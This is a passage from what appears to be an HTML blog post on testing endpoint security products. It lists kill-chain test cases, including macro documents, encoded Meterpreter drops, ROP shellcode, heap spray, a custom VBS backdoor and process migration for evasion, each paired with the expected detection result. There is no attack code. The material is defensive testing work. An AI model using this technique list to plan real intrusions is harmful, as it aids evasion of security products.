<!--[if !supportLists]-->c)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->DOC file with malicious macros (0day)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->d)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->EXE file with known 1day exploit for local
privilege escalation (ring0 exploit)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->e)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->EXE files with known malware<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 118.9pt; mso-list: l3 level2 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->a.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;"> </span><!--[endif]-->Default:
known hash<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 118.9pt; mso-list: l3 level2 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->b.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;"> </span><!--[endif]-->Encoded:
unknown hash<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->f)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->DLL files with known malware<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 762px;">
<tbody>
<tr style="height: .2in; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: HTML with exploits<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: WORD with macros<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 3;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpereter x64 as an EXE drop<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 4;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpereter x64 as a DLL drop <o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 5;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 6; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Not Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<h4 style="margin-left: 1.25in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.2<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span>Exploitation</h4>
<h2 style="margin-left: 1.25in; mso-list: l2 level3 lfo1;">
<o:p></o:p></h2>
<div class="11BodyText" style="text-indent: 25.1pt;">
For simulating 0day
attacks/exploits I have created own vulnerable Internet Explorer plugin and
wrote exploits for it. Same for DOC file tests on delivery stage, I have
created special, obfuscated macros. Because exploitation step is the most
critical step, I did analysis how each security solution under test detects and
prevents exploitation of vulnerabilities, and accordingly evaluated the product
per the defined expected behavior.<o:p></o:p><br />
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 762px;">
<tbody>
<tr style="height: 15.0pt; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: ROP Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of ROP shellcode<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of normal shellcode<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 3;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: 1day ring0 exploit<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 4;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: HeapSpray <o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 5;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: Exploit triggers - UAF, Bof<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 6;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: 0day Macros run<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 7;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: Meterpreter x86
(in mem)<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or Blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 8; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: IOC bypass - migration to EXPLORER (CreateRemoteThread)<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or Blocked<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="11BodyText" style="margin-left: 1.25in;">
<br /></div>
<div class="11BodyText" style="margin-left: 1.25in;">
<br /></div>
<h4 style="margin-left: 1.25in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.3<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->Installation</h4>
<h2 style="margin-left: 1.25in; mso-list: l2 level3 lfo1;">
<o:p></o:p></h2>
<div class="11BodyText">
Have used self-made (unknown signatures) VBS backdoor
that dropped by exploit/shellcode. Additionally have used: Metasploit Meterpreter (in different
configurations) as a backdoor. Test cases simulated next kill chain
steps: exploitation, downloading backdoor and execution.<o:p></o:p></div>
<div class="11BodyText">
Test case names:<o:p></o:p><br />
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 762px;">
<tbody>
<tr style="height: .2in; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with VBS - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with VBS - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 3;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with met64 - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 4;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with met64 - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 5;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">INSTALL: VBS backdoor run<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 6;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpereter x64 as an EXE drop<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 7;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpereter x64 as a DLL drop<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 8;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Hash based malware<o:p></o:p></span></div>
</td>
